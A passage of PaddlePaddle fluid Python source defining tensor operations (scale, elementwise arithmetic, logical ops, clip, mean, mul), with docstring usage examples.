scale = fluid.layers.data(name="scale", shape=[1], dtype='float32',
append_batch_size=False)
output = fluid.layers.scale(inputs, scale = scale, bias = 1.0)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img = np.array([[1, 2, 3], [4, 5, 6]]).astype(np.float32)
scale_np = np.array([2.]).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'x':img, 'scale':scale_np}, fetch_list=[output])
print(res) # [array([[ 3., 5., 7.], [ 9., 11., 13.]], dtype=float32)]
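
        The same computation can also be run imperatively; a minimal dygraph
        sketch (the printed values simply follow from Out = scale * X + bias):

        .. code-block:: python

            # scale in dygraph mode
            import paddle.fluid as fluid
            import numpy as np

            with fluid.dygraph.guard():
                x = fluid.dygraph.to_variable(
                    np.array([[1, 2, 3], [4, 5, 6]]).astype(np.float32))
                out = fluid.layers.scale(x, scale=2.0, bias=1.0)
                print(out.numpy())  # [[ 3.  5.  7.] [ 9. 11. 13.]]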
"""
check_variable_and_dtype(
x, "x",
        ['float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'uint8'],
"scale")
if in_dygraph_mode():
_scale = scale.numpy().item(0) if isinstance(scale, Variable) else scale
out = core.ops.scale(x, 'scale',
float(_scale), 'bias',
float(bias), 'bias_after_scale', bias_after_scale)
return dygraph_utils._append_activation_in_dygraph(out)
inputs = {'X': [x]}
attrs = {
'bias': float(bias),
'bias_after_scale': bias_after_scale,
}
if isinstance(scale, Variable):
inputs['ScaleTensor'] = [scale]
else:
attrs['scale'] = float(scale)
helper = LayerHelper('scale', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='scale', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return helper.append_activation(out)
def elementwise_add(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_add(x, y)
# z = x + y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # [3., 8., 6.]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_add(x, y, axis=1)
# z = x + y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.random.randint(1, 5, size=[2, 3, 4, 5]).astype('float32'),
"y": np.random.randint(1, 5, size=[5]).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[5], dtype='float32')
z = fluid.layers.elementwise_add(x, y, axis=3)
# z = x + y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_add')
return _elementwise_op(LayerHelper('elementwise_add', **locals()))
def elementwise_div(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_div(x, y)
# z = x / y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # [2., 0.6, 2.]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_div(x, y, axis=1)
# z = x / y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
            print(z_value) # z.shape=[2,3,4,5] (y is all zeros here, so the values are inf; the example only shows broadcasting along axis=1)
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.random.randint(1, 5, size=[2, 3, 4, 5]).astype('float32'),
"y": np.random.randint(1, 5, size=[5]).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[5], dtype='float32')
z = fluid.layers.elementwise_div(x, y, axis=3)
# z = x / y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_div')
return _elementwise_op(LayerHelper('elementwise_div', **locals()))
def elementwise_sub(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_sub(x, y)
# z = x - y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # [1., -2., 2.]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_sub(x, y, axis=1)
# z = x - y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.random.randint(1, 5, size=[2, 3, 4, 5]).astype('float32'),
"y": np.random.randint(1, 5, size=[5]).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[5], dtype='float32')
z = fluid.layers.elementwise_sub(x, y, axis=3)
# z = x - y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_sub')
return _elementwise_op(LayerHelper('elementwise_sub', **locals()))
def elementwise_mul(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_mul(x, y)
# z = x * y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # [2., 15., 8.]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_mul(x, y, axis=1)
# z = x * y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.random.randint(1, 5, size=[2, 3, 4, 5]).astype('float32'),
"y": np.random.randint(1, 5, size=[5]).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[5], dtype='float32')
z = fluid.layers.elementwise_mul(x, y, axis=3)
# z = x * y
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) # z.shape=[2,3,4,5]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_mul')
return _elementwise_op(LayerHelper('elementwise_mul', **locals()))
def elementwise_max(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_max(x, y)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) #[2, 5, 4]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_max(x, y, axis=1)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value)#[[[[1., 1., 1., 1., 1.] .... [1., 1., 1., 1., 1.]]]]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_max')
return _elementwise_op(LayerHelper('elementwise_max', **locals()))
def elementwise_min(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_min(x, y)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) #[1, 3, 2]
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.ones((2, 3, 4, 5)).astype('float32'),
"y": np.zeros((3, 4)).astype('float32')
}
x = fluid.data(name="x", shape=[2,3,4,5], dtype='float32')
y = fluid.data(name="y", shape=[3,4], dtype='float32')
z = fluid.layers.elementwise_min(x, y, axis=1)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value)#[[[[0., 0., 0., 0., 0.] .... [0., 0., 0., 0., 0.]]]]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_min')
return _elementwise_op(LayerHelper('elementwise_min', **locals()))
def elementwise_pow(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([2, 3, 4]).astype('float32'),
"y": np.array([1, 5, 2]).astype('float32')
}
x = fluid.data(name="x", shape=[3], dtype='float32')
y = fluid.data(name="y", shape=[3], dtype='float32')
z = fluid.layers.elementwise_pow(x, y)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) #[2, 243, 16]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_pow')
return _elementwise_op(LayerHelper('elementwise_pow', **locals()))
def elementwise_mod(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([10, 15, 8]).astype('int32'),
"y": np.array([3, 6, 5]).astype('int32')
}
x = fluid.data(name="x", shape=[3], dtype='int32')
y = fluid.data(name="y", shape=[3], dtype='int32')
z = fluid.layers.elementwise_mod(x, y)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) #[1, 3, 3]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_mod')
return _elementwise_op(LayerHelper('elementwise_mod', **locals()))
def elementwise_floordiv(x, y, axis=-1, act=None, name=None):
"""
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
def gen_data():
return {
"x": np.array([10, 15, 8]).astype('int32'),
"y": np.array([3, 7, 5]).astype('int32')
}
x = fluid.data(name="x", shape=[3], dtype='int32')
y = fluid.data(name="y", shape=[3], dtype='int32')
z = fluid.layers.elementwise_floordiv(x, y)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
z_value = exe.run(feed=gen_data(),
fetch_list=[z.name])
print(z_value) #[3, 2, 1]
"""
if in_dygraph_mode():
return _elementwise_op_in_dygraph(
x, y, axis=axis, act=act, op_name='elementwise_floordiv')
return _elementwise_op(LayerHelper('elementwise_floordiv', **locals()))
for func in [
elementwise_add,
elementwise_div,
elementwise_sub,
elementwise_mul,
elementwise_max,
elementwise_pow,
elementwise_min,
elementwise_mod,
elementwise_floordiv,
]:
op_proto = OpProtoHolder.instance().get_op_proto(func.__name__)
func.__doc__ = _generate_doc_string_(
op_proto,
additional_args_lines=[
"axis (int32, optional): If X.dimension != Y.dimension, \
Y.dimension must be a subsequence of x.dimension. \
And axis is the start dimension index for broadcasting Y onto X. ",
"act (string, optional): Activation applied to the output. \
Default is None. Details: :ref:`api_guide_activations_en` ",
"name (string, optional): Name of the output. \
Default is None. It's used to print debug info for developers. Details: \
:ref:`api_guide_Name` "
],
skip_attrs_set={"x_data_format", "y_data_format", "axis"
}) + """\n""" + str(func.__doc__)
for func in []:
op_proto = OpProtoHolder.instance().get_op_proto(func.__name__)
func.__doc__ = _generate_doc_string_(
op_proto,
additional_args_lines=[
"act (basestring|None): Activation applied to the output.",
"name (basestring|None): Name of the output."
])
func.__doc__ = func.__doc__ + """
Examples:
.. code-block:: python
import paddle.fluid as fluid
# example 1: shape(x) = (2, 3, 4, 5), shape(y) = (2, 3, 4, 5)
x0 = fluid.layers.data(name="x0", shape=[2, 3, 4, 5], dtype='float32')
y0 = fluid.layers.data(name="y0", shape=[2, 3, 4, 5], dtype='float32')
z0 = fluid.layers.%s(x0, y0)
# example 2: shape(X) = (2, 3, 4, 5), shape(Y) = (5)
x1 = fluid.layers.data(name="x1", shape=[2, 3, 4, 5], dtype='float32')
y1 = fluid.layers.data(name="y1", shape=[5], dtype='float32')
z1 = fluid.layers.%s(x1, y1)
# example 3: shape(X) = (2, 3, 4, 5), shape(Y) = (4, 5), with axis=-1(default) or axis=2
x2 = fluid.layers.data(name="x2", shape=[2, 3, 4, 5], dtype='float32')
y2 = fluid.layers.data(name="y2", shape=[4, 5], dtype='float32')
z2 = fluid.layers.%s(x2, y2, axis=2)
# example 4: shape(X) = (2, 3, 4, 5), shape(Y) = (3, 4), with axis=1
x3 = fluid.layers.data(name="x3", shape=[2, 3, 4, 5], dtype='float32')
y3 = fluid.layers.data(name="y3", shape=[3, 4], dtype='float32')
z3 = fluid.layers.%s(x3, y3, axis=1)
# example 5: shape(X) = (2, 3, 4, 5), shape(Y) = (2), with axis=0
x4 = fluid.layers.data(name="x4", shape=[2, 3, 4, 5], dtype='float32')
y4 = fluid.layers.data(name="y4", shape=[2], dtype='float32')
z4 = fluid.layers.%s(x4, y4, axis=0)
# example 6: shape(X) = (2, 3, 4, 5), shape(Y) = (2, 1), with axis=0
x5 = fluid.layers.data(name="x5", shape=[2, 3, 4, 5], dtype='float32')
y5 = fluid.layers.data(name="y5", shape=[2], dtype='float32')
z5 = fluid.layers.%s(x5, y5, axis=0)
""" % (func.__name__, func.__name__, func.__name__, func.__name__,
func.__name__, func.__name__)
def _logical_op(op_name, x, y, out=None, name=None, binary_op=True):
check_variable_and_dtype(x, "x", ["bool"], op_name)
if y is not None:
check_variable_and_dtype(y, "y", ["bool"], op_name)
if out is not None:
check_variable_and_dtype(out, "out", [convert_dtype(x.dtype)], op_name)
helper = LayerHelper(op_name, **locals())
if binary_op:
assert x.dtype == y.dtype
if out is None:
out = helper.create_variable_for_type_inference(dtype=x.dtype)
if binary_op:
helper.append_op(
type=op_name, inputs={"X": x,
"Y": y}, outputs={"Out": out})
else:
helper.append_op(type=op_name, inputs={"X": x}, outputs={"Out": out})
return out
@templatedoc()
def logical_and(x, y, out=None, name=None):
"""
logical_and Operator
It operates element-wise on X and Y, and returns the Out. X, Y and Out are N-dim boolean LoDTensor or Tensor.
Each element of Out is calculated by
.. math::
Out = X \land Y
Args:
x(${x_type}): ${x_comment}
y(${y_type}): ${y_comment}
out(LoDTensor or Tensor): The LoDTensor or Tensor that specifies the output of the operator, which can be any Variable that has been created in the program. The default value is None, and a new Variable will be created to save the output.
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph organizing
x = fluid.layers.data(name='x', shape=[2], dtype='bool')
y = fluid.layers.data(name='y', shape=[2], dtype='bool')
res = fluid.layers.logical_and(x=x, y=y)
# The comment lists another available method.
# res = fluid.layers.fill_constant(shape=[2], dtype='bool', value=0)
# fluid.layers.logical_and(x=x, y=y, out=res)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[1, 0], [0, 1]]).astype(np.bool)
y_i = np.array([[1, 1], [0, 0]]).astype(np.bool)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i, 'y':y_i}, fetch_list=[res])
print(res_val) # [[True, False], [False, False]]
"""
return _logical_op(
op_name="logical_and", x=x, y=y, name=name, out=out, binary_op=True)
@templatedoc()
def logical_or(x, y, out=None, name=None):
"""
logical_or Operator
It operates element-wise on X and Y, and returns the Out. X, Y and Out are N-dim boolean LoDTensor or Tensor.
Each element of Out is calculated by
.. math::
Out = X \lor Y
Args:
x(${x_type}): ${x_comment}
y(${y_type}): ${y_comment}
out(LoDTensor or Tensor): The LoDTensor or Tensor that specifies the output of the operator, which can be any Variable that has been created in the program. The default value is None, and a new Variable will be created to save the output.
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph organizing
x = fluid.layers.data(name='x', shape=[2], dtype='bool')
y = fluid.layers.data(name='y', shape=[2], dtype='bool')
res = fluid.layers.logical_or(x=x, y=y)
# The comment lists another available method.
# res = fluid.layers.fill_constant(shape=[2], dtype='bool', value=0)
# fluid.layers.logical_or(x=x, y=y, out=res)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[1, 0], [0, 1]]).astype(np.bool)
y_i = np.array([[1, 1], [0, 0]]).astype(np.bool)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i, 'y':y_i}, fetch_list=[res])
print(res_val) # [[True, True], [False, True]]
"""
return _logical_op(
op_name="logical_or", x=x, y=y, name=name, out=out, binary_op=True)
@templatedoc()
def logical_xor(x, y, out=None, name=None):
"""
logical_xor Operator
It operates element-wise on X and Y, and returns the Out. X, Y and Out are N-dim boolean LoDTensor or Tensor.
Each element of Out is calculated by
.. math::
Out = (X \lor Y) \land \lnot (X \land Y)
Args:
x(${x_type}): ${x_comment}
y(${y_type}): ${y_comment}
out(LoDTensor or Tensor): The LoDTensor or Tensor that specifies the output of the operator, which can be any Variable that has been created in the program. The default value is None, and a new Variable will be created to save the output.
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph organizing
x = fluid.layers.data(name='x', shape=[2], dtype='bool')
y = fluid.layers.data(name='y', shape=[2], dtype='bool')
res = fluid.layers.logical_xor(x=x, y=y)
# The comment lists another available method.
# res = fluid.layers.fill_constant(shape=[2], dtype='bool', value=0)
# fluid.layers.logical_xor(x=x, y=y, out=res)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[1, 0], [0, 1]]).astype(np.bool)
y_i = np.array([[1, 1], [0, 0]]).astype(np.bool)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i, 'y':y_i}, fetch_list=[res])
print(res_val) # [[False, True], [False, True]]
"""
return _logical_op(
op_name="logical_xor", x=x, y=y, name=name, out=out, binary_op=True)
@templatedoc()
def logical_not(x, out=None, name=None):
"""
logical_not Operator
It operates element-wise on X, and returns the Out. X and Out are N-dim boolean LoDTensor or Tensor.
Each element of Out is calculated by
.. math::
Out = \lnot X
Args:
x(${x_type}): ${x_comment}
out(LoDTensor/Tensor): The LoDTensor/Tensor that specifies the output of the operator, which can be any Variable that has been created in the program. The default value is None, and a new Variable will be created to save the output.
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph organizing
x = fluid.layers.data(name='x', shape=[2], dtype='bool')
res = fluid.layers.logical_not(x)
            # The comment lists another available method.
# res = fluid.layers.fill_constant(shape=[2], dtype='bool', value=0)
# fluid.layers.logical_not(x, out=res)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[1, 0]]).astype(np.bool)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i}, fetch_list=[res])
print(res_val) # [[False, True]]
"""
return _logical_op(
op_name="logical_not", x=x, y=None, name=name, out=out, binary_op=False)
@templatedoc()
def clip(x, min, max, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
min(float): ${min_comment}
max(float): ${max_comment}
name(str, optional): The default value is None.
Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`
Returns:
${out_comment}
Return Type:
${out_type}
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(
name='data', shape=[1], dtype='float32')
reward = fluid.layers.clip(x=input, min=-1.0, max=1.0)
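
        A runnable sketch (the printed values assume the op clamps every
        element into the interval [min, max]):

        .. code-block:: python

            import paddle.fluid as fluid
            import numpy as np

            x = fluid.data(name='x', shape=[None, 3], dtype='float32')
            out = fluid.layers.clip(x=x, min=-1.0, max=1.0)
            exe = fluid.Executor(fluid.CPUPlace())
            exe.run(fluid.default_startup_program())
            res, = exe.run(feed={'x': np.array([[-2.0, 0.5, 3.0]], dtype='float32')},
                           fetch_list=[out])
            print(res)  # [[-1.   0.5  1. ]]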
"""
helper = LayerHelper("clip", **locals())
if name is None:
name = unique_name.generate_with_ignorable_key(".".join(
[helper.name, 'tmp']))
out = helper.create_variable(
type=x.type, name=name, dtype=x.dtype, persistable=False)
helper.append_op(
type="clip",
inputs={"X": x},
attrs={"min": min,
"max": max},
outputs={"Out": out})
return out
@templatedoc()
def clip_by_norm(x, max_norm, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
max_norm(${max_norm_type}): ${max_norm_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable:
out(${out_type}): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(
name='data', shape=[None, 1], dtype='float32')
reward = fluid.layers.clip_by_norm(x=input, max_norm=1.0)
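
        A runnable sketch (the printed values assume the op rescales the whole
        tensor by ``max_norm / ||x||_2`` whenever its L2 norm exceeds
        ``max_norm``):

        .. code-block:: python

            import paddle.fluid as fluid
            import numpy as np

            x = fluid.data(name='x', shape=[None, 2], dtype='float32')
            out = fluid.layers.clip_by_norm(x=x, max_norm=1.0)
            exe = fluid.Executor(fluid.CPUPlace())
            exe.run(fluid.default_startup_program())
            res, = exe.run(feed={'x': np.array([[3.0, 4.0]], dtype='float32')},
                           fetch_list=[out])
            print(res)  # [[0.6 0.8]]  -- the L2 norm 5.0 is clipped down to 1.0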
"""
helper = LayerHelper("clip_by_norm", **locals())
check_variable_and_dtype(x, 'X', ['float32'], 'clip_by_norm')
check_type(max_norm, 'max_norm', (float), 'clip_by_norm')
if name is None:
name = unique_name.generate_with_ignorable_key(".".join(
[helper.name, 'tmp']))
out = helper.create_variable(
type=x.type, name=name, dtype=x.dtype, persistable=False)
helper.append_op(
type="clip_by_norm",
inputs={"X": x},
attrs={"max_norm": max_norm},
outputs={"Out": out})
return out
@templatedoc()
def mean(x, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
name(basestring|None): Name of the output.
Returns:
out(${out_type}): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.layers.data(
name='data', shape=[2, 3], dtype='float32')
mean = fluid.layers.mean(input)
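
        A runnable sketch (3.5 is simply the arithmetic mean of the fed values):

        .. code-block:: python

            import paddle.fluid as fluid
            import numpy as np

            x = fluid.data(name='x', shape=[2, 3], dtype='float32')
            out = fluid.layers.mean(x)
            exe = fluid.Executor(fluid.CPUPlace())
            exe.run(fluid.default_startup_program())
            res, = exe.run(feed={'x': np.array([[1, 2, 3], [4, 5, 6]], dtype='float32')},
                           fetch_list=[out])
            print(res)  # [3.5]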
"""
if in_dygraph_mode():
return core.ops.mean(x)
helper = LayerHelper("mean", **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'mean')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="mean", inputs={"X": x}, attrs={}, outputs={"Out": out})
return out
@templatedoc()
def merge_selected_rows(x, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
name(basestring|None): Name of the output.
Returns:
out(${out_type}): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
b = fluid.default_main_program().global_block()
var = b.create_var(
name="X", dtype="float32", persistable=True,
type=fluid.core.VarDesc.VarType.SELECTED_ROWS)
y = fluid.layers.merge_selected_rows(var)
"""
helper = LayerHelper("merge_selected_rows", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type="merge_selected_rows",
inputs={"X": x},
attrs={},
outputs={"Out": out})
return out
def mul(x, y, x_num_col_dims=1, y_num_col_dims=1, name=None):
"""
Mul Operator.
This operator is used to perform matrix multiplication for input $x$ and $y$.
The equation is:
.. math::
Out = x * y
Both the input $x$ and $y$ can carry the LoD (Level of Details) information, or not. But the output only shares the LoD information with input $x$.
Args:
x (Variable): The first input Tensor/LoDTensor of mul_op.
y (Variable): The second input Tensor/LoDTensor of mul_op.
x_num_col_dims (int, optional): The mul_op can take tensors with more than two dimensions as its inputs. If the input $x$ is a tensor with more than two dimensions, $x$ will be flattened into a two-dimensional matrix first. The flattening rule is: the first `num_col_dims` will be flattened to form the first dimension of the final matrix (the height of the matrix), and the rest `rank(x) - num_col_dims` dimensions are flattened to form the second dimension of the final matrix (the width of the matrix). As a result, height of the flattened matrix is equal to the product of $x$'s first `x_num_col_dims` dimensions' sizes, and width of the flattened matrix is equal to the product of $x$'s last `rank(x) - num_col_dims` dimensions' size. For example, suppose $x$ is a 6-dimensional tensor with the shape [2, 3, 4, 5, 6], and `x_num_col_dims` = 3. Thus, the flattened matrix will have a shape [2 x 3 x 4, 5 x 6] = [24, 30]. Default is 1.
y_num_col_dims (int, optional): The mul_op can take tensors with more than two dimensions as its inputs. If the input $y$ is a tensor with more than two dimensions, $y$ will be flattened into a two-dimensional matrix first. The attribute `y_num_col_dims` determines how $y$ is flattened. See comments of `x_num_col_dims` for more details. Default is 1.
name (str, optional): Name of the output. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default is None.
Returns:
Variable(Tensor/LoDTensor): The output Tensor/LoDTensor of mul op.
Examples:
.. code-block:: python
import paddle.fluid as fluid
dataX = fluid.layers.data(name="dataX", append_batch_size = False, shape=[2, 5], dtype="float32")
dataY = fluid.layers.data(name="dataY", append_batch_size = False, shape=[5, 3], dtype="float32")
output = fluid.layers.mul(dataX, dataY,
x_num_col_dims = 1,
y_num_col_dims = 1)
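
        A runnable sketch that checks the result against ``np.matmul`` (with
        2-D inputs and the default ``*_num_col_dims`` this is plain matrix
        multiplication):

        .. code-block:: python

            import paddle.fluid as fluid
            import numpy as np

            x = fluid.data(name="x", shape=[2, 5], dtype="float32")
            y = fluid.data(name="y", shape=[5, 3], dtype="float32")
            out = fluid.layers.mul(x, y)
            exe = fluid.Executor(fluid.CPUPlace())
            exe.run(fluid.default_startup_program())
            x_np = np.random.random((2, 5)).astype("float32")
            y_np = np.random.random((5, 3)).astype("float32")
            res, = exe.run(feed={"x": x_np, "y": y_np}, fetch_list=[out])
            print(np.allclose(res, np.matmul(x_np, y_np)))  # True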
"""
if in_dygraph_mode():
return core.ops.mul(x, y, 'x_num_col_dims', x_num_col_dims,
'y_num_col_dims', y_num_col_dims)
